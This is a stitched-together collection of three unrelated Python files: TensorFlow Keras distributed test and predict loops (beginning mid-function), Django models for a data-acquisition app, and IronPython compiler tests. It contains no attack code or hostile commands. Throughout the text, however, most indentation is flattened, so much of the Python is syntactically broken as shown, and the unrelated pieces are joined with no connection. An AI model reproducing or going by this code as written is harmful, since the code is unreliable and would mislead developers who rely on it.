for i, batch_out in enumerate(batch_outs):
outs[i] += batch_out
else:
if step == 0:
outs.append(0.)
outs[0] += batch_outs
    if verbose == 1:
progbar.update(step + 1)
for i in range(len(outs)):
outs[i] /= steps
if len(outs) == 1:
return outs[0]
return outs
def _experimental_test_loop(model, iterator, verbose=0, steps=None):
"""Test loop for evaluating with TPU DistributionStrategy.
Arguments:
model: Keras Model instance.
iterator: Iterator for input data.
verbose: Integer, Verbosity mode 0 or 1.
steps: Total number of steps (batches of samples)
before declaring predictions finished.
Ignored with the default value of `None`.
Returns:
Scalar loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the outputs.
"""
current_strategy = model._distribution_strategy
K.get_session().run(current_strategy.initialize())
def _per_device_test_function(model):
model._make_test_function()
return (model.test_function.inputs,
model.test_function.outputs,
model.test_function.updates_op,
model.test_function.session_kwargs)
# TODO(priyag, sourabhbajaj): This should likely not be hardcoded here.
K.set_learning_phase(0)
def step_fn(ctx, inputs, targets):
"""Clones the model and calls make_test_function."""
# TODO(priyag, sourabhbajaj): The model gets cloned every time
# fit/test/predict is called. We should look into caching this keyed on
# input shapes.
clone_model_on_towers(
model,
current_strategy,
make_callback_model=False,
inputs=inputs,
targets=targets)
(grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args) = current_strategy.call_for_each_tower(
_per_device_test_function, model._grouped_model)
(all_inputs, all_outputs, all_updates,
all_session_args) = distributed_training_utils.unwrap_values(
current_strategy, grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args)
combined_fn = K.Function(
all_inputs, all_outputs,
updates=all_updates,
name='distributed_test_function',
**all_session_args)
for label, output in zip(model.metrics_names, combined_fn.outputs):
if label == 'loss':
aggregation = distribute_lib.get_loss_reduction()
else:
        # We aggregate all other metrics using mean for now. This is a
        # temporary workaround until new metrics are in place.
aggregation = variable_scope.VariableAggregation.MEAN
ctx.set_last_step_output(label, output, aggregation)
return combined_fn.updates_op
# Add initial dummy values for loss and other metric tensors.
initial_loop_values = {}
initial_loop_values['loss'] = constant_op.constant(1e7)
for name, tensor in zip(model.metrics_names[1:], model.metrics_tensors):
initial_loop_values[name] = array_ops.zeros(tensor.shape, tensor.dtype)
with current_strategy.scope():
# TODO(priyag): Use steps_per_run when we use new metrics as they will
# allow handling metric computation at each step using variables.
ctx = current_strategy.run_steps_on_dataset(
step_fn, iterator, iterations=1,
initial_loop_values=initial_loop_values)
test_op = ctx.run_op
output_tensors = ctx.last_step_outputs
if verbose == 1:
progbar = Progbar(target=steps)
# Copy the weights from the original model to each of the replicated models.
orig_model_weights = model.get_weights()
with current_strategy.scope():
distributed_model = current_strategy.unwrap(model._grouped_model)[0]
distributed_training_utils.set_weights(
current_strategy, distributed_model, orig_model_weights)
assert steps is not None
outs = [0.] * len(model.metrics_names)
for step in range(steps):
_, batch_outs = K.get_session().run([test_op, output_tensors])
for i, label in enumerate(model.metrics_names):
outs[i] += batch_outs[label]
    if verbose == 1:
progbar.update(step + 1)
for i in range(len(outs)):
    outs[i] /= steps
K.get_session().run(current_strategy.finalize())
if len(outs) == 1:
return outs[0]
return outs
def predict_loop(model, iterator, verbose=0, steps=None):
"""Predict loop for predicting with DistributionStrategy.
Arguments:
model: Keras Model instance.
iterator: Iterator for input data.
verbose: Integer, Verbosity mode 0 or 1.
steps: Total number of steps (batches of samples)
before declaring `_predict_loop` finished.
Ignored with the default value of `None`.
Returns:
Array of predictions (if the model has a single output)
or list of arrays of predictions
(if the model has multiple outputs).
"""
current_strategy = model._distribution_strategy
# TODO(priyag, sourabhbajaj): Remove this when the codepaths are merged.
if current_strategy.__class__.__name__ == 'TPUStrategy':
return _experimental_predict_loop(model, iterator, verbose, steps)
if not model._grouped_model:
clone_model_on_towers(model, current_strategy)
def _per_device_predict_function(model):
model._make_predict_function()
return (model.predict_function.inputs,
model.predict_function.outputs,
model.predict_function.updates_op,
model.predict_function.session_kwargs)
inputs, _ = _get_input_from_iterator(iterator, model)
with current_strategy.scope():
(grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args) = current_strategy.call_for_each_tower(
_per_device_predict_function, model._grouped_model)
(all_inputs, all_outputs, all_updates,
all_session_args) = distributed_training_utils.unwrap_values(
current_strategy, grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args)
dataset_inputs = distributed_training_utils.flatten_perdevice_values(
current_strategy, inputs)
distributed_predict_function = K.Function(
all_inputs, all_outputs,
updates=all_updates,
name='distributed_predict_function',
**all_session_args)
if model.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = dataset_inputs + [0]
else:
ins = dataset_inputs
if verbose == 1:
progbar = Progbar(target=steps)
# Copy the weights from the original model to each of the replicated models.
orig_model_weights = model.get_weights()
with current_strategy.scope():
distributed_model = current_strategy.unwrap(model._grouped_model)[0]
distributed_training_utils.set_weights(
current_strategy, distributed_model, orig_model_weights)
if steps is not None:
# Since we do not know how many samples we will see, we cannot pre-allocate
# the returned Numpy arrays. Instead, we store one array per batch seen
# and concatenate them upon returning.
unconcatenated_outs = []
for step in range(steps):
batch_outs = distributed_predict_function(ins)
if not isinstance(batch_outs, list):
batch_outs = [batch_outs]
if step == 0:
for _ in batch_outs:
unconcatenated_outs.append([])
# TODO(anjalisridhar): Should combine the outputs from multiple towers
# correctly here.
for i, batch_out in enumerate(batch_outs):
unconcatenated_outs[i].append(batch_out)
      if verbose == 1:
progbar.update(step + 1)
if len(unconcatenated_outs) == 1:
return np.concatenate(unconcatenated_outs[0], axis=0)
return [
np.concatenate(unconcatenated_outs[i], axis=0)
for i in range(len(unconcatenated_outs))
]
def _experimental_predict_loop(model, iterator, verbose=0, steps=None):
"""Predict loop for predicting with TPU DistributionStrategy.
Arguments:
model: Keras Model instance.
iterator: Iterator for input data.
verbose: Integer, Verbosity mode 0 or 1.
steps: Total number of steps (batches of samples)
before declaring `_predict_loop` finished.
Ignored with the default value of `None`.
Returns:
Array of predictions (if the model has a single output)
or list of arrays of predictions
(if the model has multiple outputs).
"""
current_strategy = model._distribution_strategy
K.get_session().run(current_strategy.initialize())
# TODO(priyag, sourabhbajaj): This should likely not be hardcoded here.
K.set_learning_phase(0)
def _per_device_predict_function(model):
model._make_predict_function()
return (model.predict_function.inputs,
model.predict_function.outputs,
model.predict_function.updates_op,
model.predict_function.session_kwargs)
def step_fn(ctx, inputs, targets):
"""Clones the model and calls make_predict_function."""
# TODO(anjalisridhar): Support predict input correctly as it will not
# contain targets, only inputs.
del targets
# TODO(priyag, sourabhbajaj): The model gets cloned every time
# fit/test/predict is called. We should look into caching this keyed on
# input shapes.
clone_model_on_towers(
model,
current_strategy,
make_callback_model=False,
inputs=inputs)
(grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args) = current_strategy.call_for_each_tower(
_per_device_predict_function, model._grouped_model)
(all_inputs, all_outputs, all_updates,
all_session_args) = distributed_training_utils.unwrap_values(
current_strategy, grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args)
combined_fn = K.Function(
all_inputs, all_outputs,
updates=all_updates,
name='distributed_predict_function',
**all_session_args)
for label, output in zip(model.output_names, combined_fn.outputs):
ctx.set_last_step_output(label, output)
return combined_fn.updates_op
# Add initial dummy values for outputs.
initial_loop_values = {}
batch_dimension = distributed_training_utils.get_batch_dimension(iterator)
for name, tensor in zip(model.output_names, model.outputs):
# TODO(priyag): This is a workaround as we do not know the batch dimension
# of the model's output at this point.
tensor.shape.dims = [batch_dimension] + tensor.shape.dims[1:]
initial_loop_values[name] = array_ops.zeros(tensor.shape, tensor.dtype)
with current_strategy.scope():
# TODO(priyag, sourabhbajaj): Support steps_per_run if/when we add outfeed.
ctx = current_strategy.run_steps_on_dataset(
step_fn, iterator, iterations=1,
initial_loop_values=initial_loop_values)
predict_op = ctx.run_op
output_tensors = ctx.last_step_outputs
if verbose == 1:
progbar = Progbar(target=steps)
# Copy the weights from the original model to each of the replicated models.
orig_model_weights = model.get_weights()
with current_strategy.scope():
distributed_model = current_strategy.unwrap(model._grouped_model)[0]
distributed_training_utils.set_weights(
current_strategy, distributed_model, orig_model_weights)
assert steps is not None
# Since we do not know how many samples we will see, we cannot pre-allocate
# the returned Numpy arrays. Instead, we store one array per batch seen
# and concatenate them upon returning.
unconcatenated_outs = [[] for _ in model.outputs]
for step in range(steps):
_, batch_outs = K.get_session().run([predict_op, output_tensors])
# TODO(priyag): maybe need to unwrap the outputs first for MirroredStrategy.
for i, label in enumerate(model.output_names):
unconcatenated_outs[i].extend(batch_outs[label])
    if verbose == 1:
progbar.update(step + 1)
K.get_session().run(current_strategy.finalize())
if len(unconcatenated_outs) == 1:
return np.concatenate(unconcatenated_outs[0], axis=0)
return [
np.concatenate(unconcatenated_outs[i], axis=0)
for i in range(len(unconcatenated_outs))
]
def _clone_and_build_model(model, inputs=None, targets=None):
"""Clone and build the given keras_model."""
# We need to set the import here since we run into a circular dependency
# error.
from tensorflow.python.keras import models # pylint: disable=g-import-not-at-top
cloned_model = models.clone_model(model, input_tensors=inputs)
# Compile and build model.
if isinstance(model.optimizer, optimizers.TFOptimizer):
optimizer = model.optimizer
else:
optimizer_config = model.optimizer.get_config()
optimizer = model.optimizer.__class__.from_config(optimizer_config)
# TODO(priyag): Is there a cleaner way to do this? The API doc suggests a
# single tensor should be OK but it throws an error in that case.
if (targets is not None and not isinstance(targets, list) and
not isinstance(targets, dict)):
targets = [targets]
cloned_model.compile(
optimizer,
model.loss,
metrics=model.metrics,
loss_weights=model.loss_weights,
sample_weight_mode=model.sample_weight_mode,
weighted_metrics=model.weighted_metrics,
target_tensors=targets)
return cloned_model
def clone_model_on_towers(
model, strategy, make_callback_model=False, inputs=None, targets=None):
"""Create a cloned model on each tower."""
with strategy.scope():
model._grouped_model = strategy.call_for_each_tower(
_clone_and_build_model, model, inputs, targets)
if make_callback_model:
model._make_callback_model()
def _aggregate_metrics_across_towers(num_devices, out_labels, outs):
"""Aggregate metrics values across all towers.
When using `MirroredStrategy`, the number of towers is equal to the
number of devices over which training is distributed. This may not always be
the case.
Args:
num_devices: Number of devices over which the model is being distributed.
out_labels: The list of metric names passed to `compile`.
outs: The output from all the towers.
Returns:
The average value of each metric across the towers.
"""
# TODO(anjalisridhar): Temporary workaround for aggregating metrics
# across towers. Replace with the new metrics module eventually.
merged_output = []
# The first output is the total loss.
merged_output.append(outs[0])
current_index = 1
# Each label in `out_labels` corresponds to one set of metrics. The
# number of metric values corresponds to the number of devices. We
# currently take the mean of the values.
for _ in out_labels[1:]:
m = np.mean(outs[current_index:current_index + num_devices])
merged_output.append(m)
current_index += num_devices
return merged_output
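# Worked example for the aggregation above: with num_devices=2 and
# out_labels=['loss', 'acc'], the tower outputs arrive flattened as
# [total_loss, acc_dev0, acc_dev1], and the merged result keeps the loss
# and averages each per-device metric:
#
#   _aggregate_metrics_across_towers(2, ['loss', 'acc'], [0.7, 0.8, 0.9])
#   # -> [0.7, 0.85]  (np.mean([0.8, 0.9]), up to float rounding)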
def _get_input_from_iterator(iterator, model):
"""Get elements from the iterator and verify the input shape and type."""
next_element = iterator.get_next()
if isinstance(next_element, tuple):
x, y = next_element
else:
x = next_element
y = None
# Validate that all the elements in x and y are of the same type and shape.
# We can then pass the first element of x and y to `_standardize_weights`
# below and be confident of the output.
x_values, y_values = distributed_training_utils.\
validate_distributed_dataset_inputs(model._distribution_strategy, x, y)
# TODO(sourabhbajaj): Add support for sample weights in distribution
# strategy.
model._standardize_weights(x_values, y_values)
return x, y
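# For reference, the iterator consumed above is a plain tf.data iterator whose
# elements are (inputs, targets) tuples; a minimal matching pipeline
# (illustrative shapes only):
#
#   dataset = tf.data.Dataset.from_tensor_slices(
#       (np.zeros((64, 10)), np.zeros((64, 1)))).batch(8).repeat()
#   iterator = dataset.make_one_shot_iterator()
#   x, y = iterator.get_next()  # the tuple unpacked by _get_input_from_iterator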
|
|
import os
import base64
from django.db import models
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
from django.core.files.storage import FileSystemStorage
from django.utils.timezone import now
from django.core.urlresolvers import reverse
try:
from PIL import Image
except ImportError:
Image = None
from polymorphic import PolymorphicModel
from csat.acquisition import get_collector
graph_fs = FileSystemStorage(location=settings.GRAPHS_ROOT)
logs_fs = FileSystemStorage(location=settings.EXECUTION_LOGS_ROOT)
class AcquisitionSessionConfig(models.Model):
CONFIGURED, RUNNING, COMPLETED, FAILED = range(4)
STATUSES = {
CONFIGURED: _('Configured'),
RUNNING: _('Running'),
COMPLETED: _('Completed'),
FAILED: _('Completed with errors'),
}
name = models.CharField(
max_length=64,
help_text=_('Name this acquisition setup. Choose something you can '
'easily remember'))
description = models.TextField(
blank=True,
help_text=_('Describe the setup, e.g. which project are you capturing '
'data for, from which sources,...'))
temporary = models.BooleanField(default=False)
created = models.DateTimeField(auto_now_add=True)
started = models.DateTimeField(null=True, blank=True)
completed = models.DateTimeField(null=True, blank=True)
thumbnail_background = models.CharField(null=True, blank=True,
max_length=7)
def __unicode__(self):
return self.name
def get_graph_upload_path(self, filename):
return '{}/merged.graphml'.format(self.id)
graph = models.FileField(upload_to=get_graph_upload_path, storage=graph_fs,
blank=True, null=True)
def get_thumbnail_upload_path(self, filename):
return 'graph-thumbnails/{}.png'.format(self.id)
thumbnail = models.ImageField(upload_to=get_thumbnail_upload_path,
blank=True, null=True)
def get_thumbnail_url(self):
return reverse('csat:acquisition:session-thumbnail', kwargs={
'pk': self.pk})
def get_graph_url(self, raw=True):
fmt = 'graphml' if raw else 'html'
return reverse('csat:acquisition:session-view-results', kwargs={
'session_pk': self.pk,
'format': fmt,
})
@property
def status(self):
if self.started is None:
return self.CONFIGURED
if self.completed is None:
return self.RUNNING
if self.collectors.filter(status=DataCollectorConfig.FAILED).count():
return self.FAILED
return self.COMPLETED
def set_completed(self, save=True):
self.completed = now()
if save:
self.save()
def get_absolute_url(self):
return reverse('csat:acquisition:session', kwargs={'pk': self.pk})
def get_thumbnail_background(self):
if not Image or not self.thumbnail:
return False
with self.thumbnail as fh:
image = Image.open(fh)
image = image.resize((200, 200)).convert('RGB')
w, h = image.size
image = image.crop((0, h - 40, w, h - 5))
image = image.convert('P', palette=Image.ADAPTIVE, colors=3)
image.putalpha(0)
colors = image.getcolors(w * h)
colors = sorted(colors, reverse=True)
color = colors[0][1]
return '#{:02x}{:02x}{:02x}'.format(*color)
def has_dark_thumbnail(self):
color = self.thumbnail_background
if not color:
return False
color = color[1:3], color[3:5], color[5:]
color = [int(n, 16) for n in color]
brightness = sum(color) / 3.0 / 255
return brightness < 0.5
dark_thumbnail = property(has_dark_thumbnail)
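    # Worked example for the brightness test above: for
    # thumbnail_background == '#203040' the channels are (0x20, 0x30, 0x40)
    # = (32, 48, 64), so brightness = (32 + 48 + 64) / 3 / 255 ≈ 0.188 < 0.5
    # and the thumbnail counts as dark.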
class Meta:
ordering = ['created']
class DataCollectorConfig(PolymorphicModel):
READY, RUNNING, FAILED, COMPLETED = range(4)
STATUS_CHOICES = (
(READY, _('Ready to run')),
(RUNNING, _('Running')),
(FAILED, _('Failed')),
(COMPLETED, _('Completed')),
)
configurator = models.CharField(max_length=44)
session_config = models.ForeignKey(AcquisitionSessionConfig,
related_name='collectors')
started = models.DateTimeField(null=True, blank=True)
completed = models.DateTimeField(null=True, blank=True)
running_instance_id = models.CharField(max_length=128,
null=True, blank=True)
result_id = models.CharField(max_length=64, blank=True, null=True)
status = models.PositiveSmallIntegerField(
choices=STATUS_CHOICES, default=READY)
def __unicode__(self):
return u'{} / {}'.format(self.session_config, self.name)
@property
def name(self):
return self.get_collector().name
def get_graph_upload_path(self, filename):
return '{}/{}-{}.graphml'.format(self.session_config.pk, self.pk,
self.configurator)
graph = models.FileField(upload_to=get_graph_upload_path, storage=graph_fs,
blank=True,
null=True)
#schema=graphml.get_schema_path(),
def get_log_upload_path(self, filename):
return '{}/{}.log'.format(self.session_config.pk, self.pk)
output = models.FileField(upload_to=get_log_upload_path, storage=logs_fs,
blank=True, null=True)
def get_graph_url(self, raw=True):
fmt = 'graphml' if raw else 'html'
return reverse('csat:acquisition:collector-view-results', kwargs={
'session_pk': self.session_config.pk,
'collector_pk': self.pk,
'format': fmt,
})
def get_log_url(self, raw=True):
fmt = 'txt' if raw else 'html'
return reverse('csat:acquisition:collector-view-log', kwargs={
'session_pk': self.session_config.pk,
'collector_pk': self.pk,
'format': fmt,
})
def set_running(self, save=True):
if self.status != DataCollectorConfig.READY:
raise RuntimeError('Collector in invalid state: {}'.format(
self.status))
self.status = DataCollectorConfig.RUNNING
self.started = now()
if save:
self.save()
def set_failed(self, save=True):
if self.status not in (DataCollectorConfig.RUNNING,
DataCollectorConfig.READY):
raise RuntimeError('Collector in invalid state: {}'.format(
self.status))
if not self.started:
self.started = now()
self.status = DataCollectorConfig.FAILED
self.completed = now()
if save:
self.save()
def set_completed(self, save=True):
if self.status not in (DataCollectorConfig.RUNNING,
DataCollectorConfig.READY):
raise RuntimeError('Collector in invalid state: {}'.format(
self.status))
if not self.started:
self.started = now()
self.status = DataCollectorConfig.COMPLETED
self.completed = now()
if save:
self.save()
def create_postback_url(self, save=True):
if self.result_id:
raise ValueError('Postback URL already defined')
if self.status in (DataCollectorConfig.FAILED,
DataCollectorConfig.COMPLETED):
raise RuntimeError('Collector in invalid state: {}'.format(
self.status))
self.result_id = base64.urlsafe_b64encode(os.urandom(48))
if save:
self.save()
return self.get_postback_url()
def get_postback_url(self):
if not self.result_id:
raise ValueError('Postback URL not yet defined')
return reverse('csat:acquisition:collector-upload-results', kwargs={
'result_id': self.result_id,
})
def get_collector(self):
return get_collector(self.configurator)
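# A rough lifecycle sketch for the two models above (the 'demo' configurator
# name is hypothetical; the view wiring lives elsewhere in csat):
#
#   session = AcquisitionSessionConfig.objects.create(name='My session')
#   collector = DataCollectorConfig.objects.create(
#       configurator='demo', session_config=session)
#   postback = collector.create_postback_url()  # mints result_id and saves
#   collector.set_running()    # READY -> RUNNING, stamps `started`
#   collector.set_completed()  # RUNNING -> COMPLETED, stamps `completed`
#   session.set_completed()    # stamps the session-level `completed`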
|
|
# Licensed to the .NET Foundation under one or more agreements.
# The .NET Foundation licenses this file to you under the Apache 2.0 License.
# See the LICENSE file in the project root for more information.
##
## Testing IronPython Compiler
##
from iptest.assert_util import *
skiptest("win32")
from iptest.file_util import *
from iptest.process_util import *
import sys
import os
import System
from System.Collections.Generic import List
remove_ironpython_dlls(testpath.public_testdir)
load_iron_python_dll()
import IronPython
if False: #Needs to be updated or removed for DLR
from IronPython.Hosting import PythonCompiler
load_iron_python_test()
def CompileAsDll(fileName, assemblyName):
sources = List[str]()
sources.Add(fileName)
pc = PythonCompiler(sources, assemblyName)
pc.TargetKind = System.Reflection.Emit.PEFileKinds.Dll
pc.Compile()
def CompileOneFileAsConsoleApp1(fileName, assemblyName, setMainFile):
sources = List[str]()
sources.Add(fileName)
pc = PythonCompiler(sources, assemblyName)
if setMainFile:
pc.MainFile = fileName
pc.Compile()
def CompileOneFileAsConsoleApp2(fileName, assemblyName):
sources = List[str]()
sources.Add(fileName)
pc = PythonCompiler(sources, assemblyName)
pc.MainFile = "NotExistFile"
pc.Compile()
def CompileTwoFilesAsConsoleApp(fileName1, fileName2, assemblyName, setMainFile):
sources = List[str]()
sources.Add(fileName1)
sources.Add(fileName2)
pc = PythonCompiler(sources, assemblyName)
if (setMainFile):
pc.MainFile = fileName1
pc.Compile()
def UsingReference(fileName, typeName, assemblyName):
sources = List[str]()
sources.Add(fileName)
pc = PythonCompiler(sources, assemblyName)
pc.MainFile = fileName
refAsms = List[str]()
refAsms.Add(System.Type.GetType(typeName).Assembly.FullName)
pc.ReferencedAssemblies = refAsms
pc.Compile()
def CheckIncludeDebugInformation(fileName, assemblyName, include):
sources = List[str]()
sources.Add(fileName)
pc = PythonCompiler(sources, assemblyName)
pc.IncludeDebugInformation = include
pc.Compile()
def FileExists(file):
return System.IO.File.Exists(file)
def DeleteFile(file):
for i in range(5):
try:
System.IO.File.Delete(file)
break
except:
System.Threading.Thread.Sleep(1000)
def FileRemoval(*files):
for file in files:
DeleteFile(file)
def GetFullPath(file):
return System.IO.Path.GetFullPath(file).ToLower()
def RunPythonExe(file, *args):
fullpath = GetFullPath(file)
temppath = System.IO.Path.Combine(sys.prefix, System.IO.FileInfo(fullpath).Name).ToLower()
if (fullpath != temppath):
System.IO.File.Copy(fullpath, temppath, True)
realargs = [temppath]
realargs.extend(args)
try:
retval = os.spawnv(0, temppath, realargs)
except:
retval = 1
# hack
if (fullpath != temppath):
DeleteFile(temppath)
Assert(not retval)
## compile as dll
source, assembly, pdbfile = "tempFile1.tpy", "tempFile1.dll", "tempFile1.pdb"
write_to_file(source, '''
class B:
def M1(self):
return 20
''')
@disabled("Needs to be updated or removed for DLR")
def test_sanity():
FileRemoval(assembly, pdbfile);
CompileAsDll(source, assembly)
Assert(FileExists(assembly))
Assert(FileExists(pdbfile))
@disabled("Needs to be updated or removed for DLR")
def test_one_source_consoleapp():
## compile as exe
## if only one source file, you do not necessarily specify the main file
source, assembly, pdbfile = "tempFile1.tpy", "tempFile1.exe", "tempFile1.pdb"
FileRemoval(assembly, pdbfile);
CompileOneFileAsConsoleApp1(source, assembly, True)
Assert(FileExists(assembly))
Assert(FileExists(pdbfile))
FileRemoval(assembly, pdbfile);
CompileOneFileAsConsoleApp1(source, assembly, False)
Assert(FileExists(assembly))
Assert(FileExists(pdbfile))
## compile as exe, but main file is INVALID
AssertError(Exception, CompileOneFileAsConsoleApp2, source, assembly)
@disabled("Needs to be updated or removed for DLR")
def test_two_source_consoleapp():
## compile 2 files as exe
source1, source2, assembly, pdbfile = "tempFile2.tpy", "tempFile1.tpy", "tempFile2.exe", "tempFile2.pdb"
write_to_file(source1, '''
import tempFile1
class D(tempFile1.B):
def M2(self):
return 100
b = tempFile1.B()
if (b.M1() != 20) :
raise AssertionError("failed 1")
d= D()
if (d.M2() != 100):
raise AssertionError("failed 2")
''')
FileRemoval(assembly, pdbfile);
CompileTwoFilesAsConsoleApp(source1, source2, assembly, True)
Assert(FileExists(assembly))
Assert(FileExists(pdbfile))
RunPythonExe(assembly)
## compile 2 files as exe, but main file is not set
AssertError(Exception, CompileTwoFilesAsConsoleApp, source1, source2, assembly, False)
@disabled("Needs to be updated or removed for DLR")
def test_debug_consoleapp():
## IncludeDebugInformation
source, assembly, pdbfile = "tempFile1.tpy", "tempFile1.dll", "tempFile1.pdb"
FileRemoval(assembly, pdbfile);
CheckIncludeDebugInformation(source, assembly, True)
Assert(FileExists(assembly))
Assert(FileExists(pdbfile))
FileRemoval(assembly, pdbfile);
CheckIncludeDebugInformation(source, assembly, False)
Assert(FileExists(assembly))
Assert(FileExists(pdbfile) == False)
@disabled("Needs to be updated or removed for DLR")
def test_referenced_assemblies_consoleapp():
## Test Using referenced assemblies
source, assembly, pdbfile = "tempFile3.tpy", "tempFile3.exe", "tempFile3.pdb"
import clr
clr.AddReferenceByPartialName("System.Xml")
# sys.LoadAssembly...("System.xml") is emitted because of referenced assemblies specified
write_to_file(source, '''
import System
import System.Xml
tw = System.Xml.XmlTextWriter("tempResult.xml", System.Text.Encoding.ASCII)
tw.WriteStartDocument()
tw.WriteStartElement("PythonCompiler")
tw.WriteEndElement()
tw.WriteEndDocument()
tw.Close()
''')
fullTypeName = System.Type.GetType("System.Int32").AssemblyQualifiedName.split(',', 2)
UsingReference(source, "System.Xml.XmlTextReader, System.Xml," + fullTypeName[2], assembly)
tempXml = "tempResult.xml"
## BE CLEAN
FileRemoval(tempXml)
## RUN
RunPythonExe(assembly)
## CHECK
Assert(FileExists(tempXml), "File was not generated after running the exe")
f = open(tempXml)
Assert(f.read().find("PythonCompiler") != -1, "The specified word is not found in the file")
f.close()
FileRemoval(tempXml)
for filename in ['tempFile1', 'tempFile2', 'tempFile3']:
for suffix in [ 'tpy', 'dll', 'exe', 'pdb']:
FileRemoval(filename + '.' + suffix)
#
# verify that generated exe will run stand alone.
#
@disabled("Needs to be updated or removed for DLR")
def test_exe_standalone():
tempFile1 = '''
class B:
def M1(self):
return 20
'''
tempFile2 = '''
import tempFile1
class D(tempFile1.B):
def M2(self):
return 100
b = tempFile1.B()
if (b.M1() != 20) :
raise AssertionError("failed 1")
d= D()
if (d.M2() != 100):
raise AssertionError("failed 2")
'''
tempFileName1 = GetFullPath("tempFile1.py")
tempFileName2 = GetFullPath("tempFile2.py")
tempExeName1 = GetFullPath("tempFile1.exe")
tempExeName2 = GetFullPath("tempFile2.exe")
tempPdbName1 = GetFullPath("tempFile1.pdb")
tempPdbName2 = GetFullPath("tempFile2.pdb")
write_to_file(tempFileName1, tempFile1)
write_to_file(tempFileName2, tempFile2)
AreEqual(launch_ironpython_changing_extensions(tempFileName2, ["-X:SaveAssemblies"], ["-X:LightweightScopes", "-X:AssembliesDir"]), 0)
RunPythonExe(tempExeName2)
FileRemoval(tempFileName1, tempFileName2, tempExeName1, tempExeName2, tempPdbName1, tempPdbName2)
#
# Verify that the executable doesn't get generated
#
tempFile1 = """
import System
files = map(lambda extension: System.IO.Path.ChangeExtension(__file__, extension), [".dll", ".exe", ".pdb"])
for file in files:
if System.IO.File.Exists(file):
print file, "exists"
raise AssertionError(file + " exists")
"""
write_to_file(tempFileName1, tempFile1)
AreEqual(launch_ironpython_changing_extensions(tempFileName1, [], ["-X:SaveAssemblies"]), 0)
FileRemoval(tempFileName1, tempExeName1, tempPdbName1)
source1 = "tempFile1.tpy"
source2 = "tempFile2.tpy"
assembly = "tempFile1.exe"
pdbfile = "tempFile1.pdb"
write_to_file(source1, """
import tempFile2
if tempFile2.value != 8.0:
raise AssertionError("failed import built-in")
""")
write_to_file(source2, """
import math
value = math.pow(2, 3)
""")
CompileTwoFilesAsConsoleApp(source1, source2, assembly, True)
Assert(FileExists(assembly))
Assert(FileExists(pdbfile))
RunPythonExe(assembly)
FileRemoval(source1, source2, assembly)
# verify arguments are passed through...
write_to_file(source1, """
import sys
def CustomAssert(c):
    if not c: raise AssertionError("Assertion Failed")
CustomAssert(sys.argv[0].lower() == sys.argv[4].lower())
sys.exit(int(sys.argv[1]) + int(sys.argv[2]) + int(sys.argv[3]))
""")
CompileOneFileAsConsoleApp1(source1, assembly, False)
RunPythonExe(assembly, 24, -22, -2, System.IO.Path.Combine(sys.prefix, assembly))
RunPythonExe(".\\" + assembly, 24, -22, -2, System.IO.Path.Combine(sys.prefix, assembly))
FileRemoval(source1, assembly)
@disabled("Needs to be updated or removed for DLR")
def test_compilersinktest():
from IronPythonTest import PythonCompilerSinkTest
st = PythonCompilerSinkTest()
for s in ['''
class Class:zxvc
"Description of Class"cxvxcvb
''',
'(1 and 1) = 1',
'(lambda x: x = 1 )',
' print 1',
'(name1 =1) = 1',
'''d = {}
for x in d.keys()
pass
''',
]:
Assert(st.CompileWithTestSink(s) > 0)
for s in [
'name = 1',
'(name) = 1',
'(name1,name2) = (1,2)',
'name, = (1,0)',
]:
Assert(st.CompileWithTestSink(s) == 0)
@disabled("ResourceFile is not available anymore")
def test_ip_hosting_resource_file():
'''
Test to hit IronPython.Hosting.ResourceFile.
'''
rf_list = [ IronPython.Hosting.ResourceFile("name0", "file0"),
IronPython.Hosting.ResourceFile("name1", "file1", False),
]
rf_list[0].PublicResource = False
for i in range(len(rf_list)):
AreEqual(rf_list[i].Name, "name" + str(i))
rf_list[i].Name = "name"
AreEqual(rf_list[i].Name, "name")
AreEqual(rf_list[i].File, "file" + str(i))
rf_list[i].File = "file"
AreEqual(rf_list[i].File, "file")
AreEqual(rf_list[i].PublicResource, False)
rf_list[i].PublicResource = True
AreEqual(rf_list[i].PublicResource, True)
@skip("multiple_execute")
@skip("netstandard") # no clr.CompileModules in netstandard
def test_compiled_code():
if System.Environment.GetEnvironmentVariable('DLR_SaveAssemblies'):
# The SaveAssemblies option is not compatible with saving code to disk
print('... skipping test if DLR_SaveAssemblies is set...')
return
import clr
pyil = os.path.join(testpath.temporary_dir, 'test.pyil')
# make sure we can compile
clr.CompileModules(pyil, os.path.join(testpath.public_testdir, 'test_class.py'))
# make sure we can compile multiple files
clr.CompileModules(pyil, os.path.join(testpath.public_testdir, 'test_class.py'), os.path.join(testpath.public_testdir, 'test_slice.py'))
clr.AddReferenceToFileAndPath(pyil)
import nt
# and make sure we can run some reasonable sophisticated code...
System.IO.File.Move(os.path.join(testpath.public_testdir, 'test_class.py'), 'old_test_class.py')
try:
import test_class
Assert(test_class.test_oldstyle_getattr.__doc__ != '')
finally:
System.IO.File.Move('old_test_class.py', os.path.join(testpath.public_testdir, 'test_class.py'))
@skip("multiple_execute")
@skip("netstandard") # no System.ICloneable in netstandard
def test_cached_types():
import clr
from System import IComparable, IFormattable, ICloneable
import IronPythonTest
cwd = os.getcwd()
os.chdir(testpath.temporary_dir)
# basic sanity test that we can compile...
clr.CompileSubclassTypes('test', (object, ))
clr.CompileSubclassTypes('test', object)
clr.CompileSubclassTypes('test', object, str, int, float, complex)
clr.CompileSubclassTypes('test', (object, IComparable[()]))
clr.CompileSubclassTypes('test', (object, IComparable[()]), (str, IComparable[()]))
# build an unlikely existing type and make sure construction gives us
# back the correct type.
clr.CompileSubclassTypes('cached_type_dll', (object, IComparable[()], IFormattable, ICloneable))
asm = System.Reflection.Assembly.LoadFrom(os.path.join(testpath.temporary_dir, 'cached_type_dll.dll'))
clr.AddReference(asm)
class x(object, IComparable[()], IFormattable, ICloneable):
pass
a = x()
AreEqual(clr.GetClrType(x).Assembly, asm)
# collect all types that are available in IronPythonTest and
# pre-gen them, then run test_inheritance to make sure it all works.
types = []
queue = [IronPythonTest]
while queue:
cur = queue.pop()
for name in dir(cur):
attr = getattr(cur, name)
if type(attr) is type:
clrType = clr.GetClrType(attr)
